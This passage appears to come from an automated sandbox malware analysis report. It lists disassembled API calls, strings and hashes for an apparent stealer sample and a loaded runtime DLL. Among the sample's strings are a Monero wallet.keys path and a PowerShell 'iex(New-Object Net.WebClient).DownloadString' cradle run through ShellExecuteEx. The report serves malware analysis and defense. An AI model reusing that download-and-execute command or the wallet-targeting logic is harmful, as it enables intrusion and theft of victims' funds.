                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: String___crt$Typememset
                                    • String ID:
                                    • API String ID: 3530896902-3916222277
                                    • Opcode ID: d8b59675832c7bcb0dbbb11c85118ac1a48557f4cbe34c03fbffc8ccb46d2367
                                    • Instruction ID: efe3aa0d26ec477dcbb713bc57a44bb18e0885e94ae3a4e91402054434154699
                                    • Opcode Fuzzy Hash: d8b59675832c7bcb0dbbb11c85118ac1a48557f4cbe34c03fbffc8ccb46d2367
                                    • Instruction Fuzzy Hash: 3641E77050079C5EDF258B64CD85BFBBBF9AB45704F1884E8E5C686182E3719B458FA0
                                    APIs
                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C6AF480
                                      • Part of subcall function 6C67F100: LoadLibraryW.KERNEL32(shell32,?,6C6ED020), ref: 6C67F122
                                      • Part of subcall function 6C67F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C67F132
                                    • CloseHandle.KERNEL32(00000000), ref: 6C6AF555
                                      • Part of subcall function 6C6814B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C681248,6C681248,?), ref: 6C6814C9
                                      • Part of subcall function 6C6814B0: memcpy.VCRUNTIME140(?,6C681248,00000000,?,6C681248,?), ref: 6C6814EF
                                      • Part of subcall function 6C67EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C67EEE3
                                    • CreateFileW.KERNEL32 ref: 6C6AF4FD
                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C6AF523
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                    • String ID: \oleacc.dll
                                    • API String ID: 2595878907-3839883404
                                    • Opcode ID: 2401c0f2dcae2fb755b7c7be94d4958dbffec647d44a208d6bcdee7fdebabaae
                                    • Instruction ID: 95a9cd6dd354a4cbdc1b96615f5018a7cf5906068dbbe535fc77d0dfb6b60d67
                                    • Opcode Fuzzy Hash: 2401c0f2dcae2fb755b7c7be94d4958dbffec647d44a208d6bcdee7fdebabaae
                                    • Instruction Fuzzy Hash: 1C41B3706087109FE720DF69D884B9AB7F4AF95318F104E1CF5A083650EB70D94ACB9B
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00192895
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001927D4
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00192814
                                    • ')", xrefs: 001927C3
                                    • <, xrefs: 00192849
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: df2a5398791e41f99f6e172a213d199b41102228520ce2d9167cc09103bfa099
                                    • Instruction ID: 275d8afb77b48c7f0fcb52831e2a4fd56d8e35dd5f6d38fd3462cdd7d952d694
                                    • Opcode Fuzzy Hash: df2a5398791e41f99f6e172a213d199b41102228520ce2d9167cc09103bfa099
                                    • Instruction Fuzzy Hash: 2641CC71D102089ADF19FBA0C896BDDBB78AF25300F804529F416671A2EF712A4DDFD2
                                    APIs
                                    • SetLastError.KERNEL32(00000000), ref: 6C6D7526
                                    • __Init_thread_footer.LIBCMT ref: 6C6D7566
                                    • __Init_thread_footer.LIBCMT ref: 6C6D7597
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer$ErrorLast
                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                    • API String ID: 3217676052-1401603581
                                    • Opcode ID: 32a74874c14b7cb24b352903ec55dc3313c147c05b05bd34e210ef51ac4586b9
                                    • Instruction ID: 4ed941e13e5acb950da6ad9c3fe26dac6515180091c2a906618d4c137afc43a0
                                    • Opcode Fuzzy Hash: 32a74874c14b7cb24b352903ec55dc3313c147c05b05bd34e210ef51ac4586b9
                                    • Instruction Fuzzy Hash: 7A21F5317005019BCB158FEAE895E99B3B7EB87325F064529E82587F40CB31B802CE9F
                                    APIs
                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C6DC0E9), ref: 6C6DC418
                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6DC437
                                    • FreeLibrary.KERNEL32(?,6C6DC0E9), ref: 6C6DC44C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                    • API String ID: 145871493-2623246514
                                    • Opcode ID: d87170b1200daa32979419512649dc051f49d00aa40abe16611bdddead90e97b
                                    • Instruction ID: c996828b5942082b6b8e2d1c67a5d7e0f7bb3d2bb249456794d82259501d548b
                                    • Opcode Fuzzy Hash: d87170b1200daa32979419512649dc051f49d00aa40abe16611bdddead90e97b
                                    • Instruction Fuzzy Hash: B8E09271715309ABDF006F73AA887217BFAAB4B345F044116AA35D2B10EBB4D002CA5E
                                    APIs
                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C674E5A
                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C674E97
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C674EE9
                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C674F02
                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C674F1E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                    • String ID:
                                    • API String ID: 713647276-0
                                    • Opcode ID: db4f394fc8a03d7614d901dcc203f6446004040c8934e939372a21b9b70dc86d
                                    • Instruction ID: e31991be02ecc7b1a0c37c1cd5a997c5229e3c9bd155eeba8304e9c47a12eea8
                                    • Opcode Fuzzy Hash: db4f394fc8a03d7614d901dcc203f6446004040c8934e939372a21b9b70dc86d
                                    • Instruction Fuzzy Hash: 8141F0716087019FC721CF29C8849ABBBE4BF8A354F108E1DF56687640DBB0E955CFA6
                                    APIs
                                    • moz_xmalloc.MOZGLUE(-00000002,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C68159C
                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C6815BC
                                    • moz_xmalloc.MOZGLUE(-00000001,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C6815E7
                                    • free.MOZGLUE(?,?,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C681606
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C681637
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                    • String ID:
                                    • API String ID: 733145618-0
                                    • Opcode ID: 06631a83c1c3e1d099ceb50881c0dedc18b2fd1fb2d79e6f14d6d6865bd6ab99
                                    • Instruction ID: d7f3d4f5142a85b999d67a1e89b611d21ce6c77a386dd775177e644c72e730be
                                    • Opcode Fuzzy Hash: 06631a83c1c3e1d099ceb50881c0dedc18b2fd1fb2d79e6f14d6d6865bd6ab99
                                    • Instruction Fuzzy Hash: E9312CB19011059BC7148E7CD8504AE77A5FB863747240B2DE433DBBD4EB30D94587AA
                                    APIs
                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAD9D
                                      • Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26
                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DADAC
                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE01
                                    • GetLastError.KERNEL32(?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE1D
                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE3D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                    • String ID:
                                    • API String ID: 3161513745-0
                                    • Opcode ID: cd440bd74a7659d025e7a607f88f10a6cd912c64e24306336891543727bc806f
                                    • Instruction ID: b2c561d380d4368a3de6d1abb3a727a147de282b73418beaab639840acbb5f67
                                    • Opcode Fuzzy Hash: cd440bd74a7659d025e7a607f88f10a6cd912c64e24306336891543727bc806f
                                    • Instruction Fuzzy Hash: E43186B19052159FD710DF798C44AABBBF8EF49710F15442DE85AD7700E734E805CBA8
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C67B532
                                    • moz_xmalloc.MOZGLUE(?), ref: 6C67B55B
                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C67B56B
                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C67B57E
                                    • free.MOZGLUE(00000000), ref: 6C67B58F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                    • String ID:
                                    • API String ID: 4244350000-0
                                    • Opcode ID: ce0d6b5070d816cc6e80a1f032b05b30dab1e1924fd1c49e1c553e31739db2b7
                                    • Instruction ID: ca28b8b1675c212be558220117f7de1aca2cebee3c3b2696999ce9e4e8322277
                                    • Opcode Fuzzy Hash: ce0d6b5070d816cc6e80a1f032b05b30dab1e1924fd1c49e1c553e31739db2b7
                                    • Instruction Fuzzy Hash: B8210771A002059BEB108F69CC80BAABBB9FF86314F284529E918DB341E736D911C7B5
                                    APIs
                                    • StrStrA.SHLWAPI(013ADC28,?,?,?,00190F1C,?,013ADC28,00000000), ref: 00198D0C
                                    • lstrcpyn.KERNEL32(003AD378,013ADC28,013ADC28,?,00190F1C,?,013ADC28), ref: 00198D30
                                    • lstrlen.KERNEL32(?,?,00190F1C,?,013ADC28), ref: 00198D47
                                    • wsprintfA.USER32 ref: 00198D67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 64b7c34789eb02829982939b627d18054a0b55712914d1cfaf68e6905c0f0be6
                                    • Instruction ID: c9ba16e13058d614b4644b05ffbcdc1094794366c76d48bc1363602f4f4163c2
                                    • Opcode Fuzzy Hash: 64b7c34789eb02829982939b627d18054a0b55712914d1cfaf68e6905c0f0be6
                                    • Instruction Fuzzy Hash: 0901E1B9500208FFCB05DFA8D954DAE7BB9EF4A345F108148F90A9B344CB71AA50DB91
                                    APIs
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C673DEF), ref: 6C6B0D71
                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C673DEF), ref: 6C6B0D84
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C673DEF), ref: 6C6B0DAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Virtual$Free$Alloc
                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                    • API String ID: 1852963964-2186867486
                                    • Opcode ID: 18ef300a787ac60527e94d57bd96e10736540c78704e2b211e0c14a6645224c0
                                    • Instruction ID: 16a7935057ed6efd78885f4954fde02d1b71d82d60877ecd59ec1b67465b3192
                                    • Opcode Fuzzy Hash: 18ef300a787ac60527e94d57bd96e10736540c78704e2b211e0c14a6645224c0
                                    • Instruction Fuzzy Hash: 38F080B138139823E61015665F06B962E9F67C2B55F344035F225FADC0DA70E411876D
                                    APIs
                                      • Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
                                      • Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA
                                    • EnterCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D4F2
                                    • LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D50B
                                      • Part of subcall function 6C67CFE0: EnterCriticalSection.KERNEL32(6C6FE784), ref: 6C67CFF6
                                      • Part of subcall function 6C67CFE0: LeaveCriticalSection.KERNEL32(6C6FE784), ref: 6C67D026
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D52E
                                    • EnterCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D690
                                    • LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D751
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                    • String ID: MOZ_CRASH()
                                    • API String ID: 3805649505-2608361144
                                    • Opcode ID: c9aede8dd9eda3211db7316de22d9e9311b2ee067b46ee3700ff65acc3d77de1
                                    • Instruction ID: d93ad2189e70c190fd9f8374d2d6f141bb0ba1a1ec863a5c1d42d8edd0aecb4d
                                    • Opcode Fuzzy Hash: c9aede8dd9eda3211db7316de22d9e9311b2ee067b46ee3700ff65acc3d77de1
                                    • Instruction Fuzzy Hash: 2051E371A047068FD714CF29C0D065ABBF2EB8A704F14493ED5AAC7B84D771E801CB5A
                                    APIs
                                      • Part of subcall function 6C674290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C6B3EBD,6C6B3EBD,00000000), ref: 6C6742A9
                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6CB127), ref: 6C6CB463
                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB4C9
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6CB4E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: _getpidstrlenstrncmptolower
                                    • String ID: pid:
                                    • API String ID: 1720406129-3403741246
                                    • Opcode ID: 38bb152147dd68db6649754623ece22ac30c8b39985866d1befb1dad53ee70b1
                                    • Instruction ID: a9d4d016f9d7fcbd9bfc97b9a82707e7e0e73c05ca050ef4f63845b5527cf403
                                    • Opcode Fuzzy Hash: 38bb152147dd68db6649754623ece22ac30c8b39985866d1befb1dad53ee70b1
                                    • Instruction Fuzzy Hash: ED314631B05208DFDB10DFA9D880AEEB7B6FF85318F540529D81167A40D736E849CBEA
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00196103
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001961C6
                                    • ExitProcess.KERNEL32 ref: 001961F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
